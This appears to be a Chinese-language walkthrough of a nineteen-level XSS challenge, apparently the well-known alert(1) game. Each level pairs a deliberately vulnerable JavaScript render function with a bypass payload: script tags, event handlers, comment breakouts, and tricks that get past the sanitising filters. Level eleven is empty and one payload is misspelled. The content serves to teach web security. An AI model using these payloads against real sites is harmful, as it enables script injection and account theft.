第一关
1
2
3
| function render (input) {
return '<div>' + input + '</div>'
}
|
payload=<script>alert(1)</script>
第二关
1
2
3
| function render (input) {
return '<textarea>' + input + '</textarea>'
}
|
payload=</textarea><script>alert(1)</script>
第三关
1
2
3
| function render (input) {
return '<input type="name" value="' + input + '">'
}
|
payload="><script>alert(1)</script>
第四关
1
2
3
4
5
| function render (input) {
const stripBracketsRe = /[()]/g
input = input.replace(stripBracketsRe, '')
return input
}
|
payload=<script>alert`1`</script>
第五关
1
2
3
4
5
| function render (input) {
const stripBracketsRe = /[()`]/g
input = input.replace(stripBracketsRe, '')
return input
}
|
payload=<script>window.onerror=eval;throw'=alert\x281\x29'</script>
第六关
1
2
3
4
| function render (input) {
input = input.replace(/-->/g, '😂')
return '<!-- ' + input + ' -->'
}
|
payload=--!><script>alert(1)</script><!--
第七关
1
2
3
4
| function render (input) {
input = input.replace(/auto|on.*=|>/ig, '_')
return `<input value=1 ${input} type="text">`
}
|
payload=
type="image" src="s" onerror
="alert(1)"
注意换行
第八关
1
2
3
4
5
6
| function render (input) {
const stripTagsRe = /<\/?[^>]+>/gi
input = input.replace(stripTagsRe, '')
return `<article>${input}</article>`
}
|
payload=<body onload="alert(1)"
第九关
1
2
3
4
5
6
7
8
| function render (src) {
src = src.replace(/<\/style>/ig, '/* \u574F\u4EBA */')
return `
<style>
${src}
</style>
`
}
|
payload=
</style
><script>alert(1)</script>
第十关
1
2
3
4
5
6
7
| function render (input) {
let domainRe = /^https?:\/\/www\.segmentfault\.com/
if (domainRe.test(input)) {
return `<script src="${input}"></script>`
}
return 'Invalid URL'
}
|
payload=https://www.segmentfault.com" onload="alert(1)
第十一关
第十二关
1
2
3
4
| function render (input) {
input = input.toUpperCase()
return `<h1>${input}</h1>`
}
|
payload=<img src=1 onerror=alert(1)>
第十三关
1
2
3
4
5
| function render (input) {
input = input.replace(/script/ig, '')
input = input.toUpperCase()
return '<h1>' + input + '</h1>'
}
|
同上
payload=<img src=1 onerror=alert(1)>
第十四关
1
2
3
4
5
6
7
8
| function render (input) {
input = input.replace(/[</"']/g, '')
return `
<script>
// alert('${input}')
</script>
`
}
|
payload=
alert(1)
-->
第十五关
1
2
3
4
5
| function render (input) {
input = input.replace(/<([a-zA-Z])/g, '<_$1')
input = input.toUpperCase()
return '<h1>' + input + '</h1>'
}
|
payload=<ſcript src="https://www.baidu.com" onload=alert(1)></script>
第十六关
1
2
3
4
5
6
7
8
9
10
11
| function render (input) {
function escapeHtml(s) {
return s.replace(/&/g, '&')
.replace(/'/g, ''')
.replace(/"/g, '"')
.replace(/</g, '<')
.replace(/>/g, '>')
.replace(/\//g, '/')
}
return `<img src onerror="console.error('${escapeHtml(input)}')">`
}
|
payload=');alert('1
第十七关
1
2
3
4
5
6
7
| function render (input) {
return `
<script>
window.data = ${input}
</script>
`
}
|
payload=alet(1)
第十八关
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
|
function render (s) {
function escapeJs (s) {
return String(s)
.replace(/\\/g, '\\\\')
.replace(/'/g, '\\\'')
.replace(/"/g, '\\"')
.replace(/`/g, '\\`')
.replace(/</g, '\\74')
.replace(/>/g, '\\76')
.replace(/\//g, '\\/')
.replace(/\n/g, '\\n')
.replace(/\r/g, '\\r')
.replace(/\t/g, '\\t')
.replace(/\f/g, '\\f')
.replace(/\v/g, '\\v')
.replace(/\0/g, '\\0')
}
s = escapeJs(s)
return `
<script>
var url = 'javascript:console.log("${s}")'
var a = document.createElement('a')
a.href = url
document.body.appendChild(a)
a.click()
</script>
`
}
|
payload=");alert(1)//
第十九关
1
2
3
4
5
|
function escape (s) {
s = s.replace(/"/g, '\\"')
return '<script>console.log("' + s + '");</script>'
}
|
payload=
</script><script>
alert(1)
-->
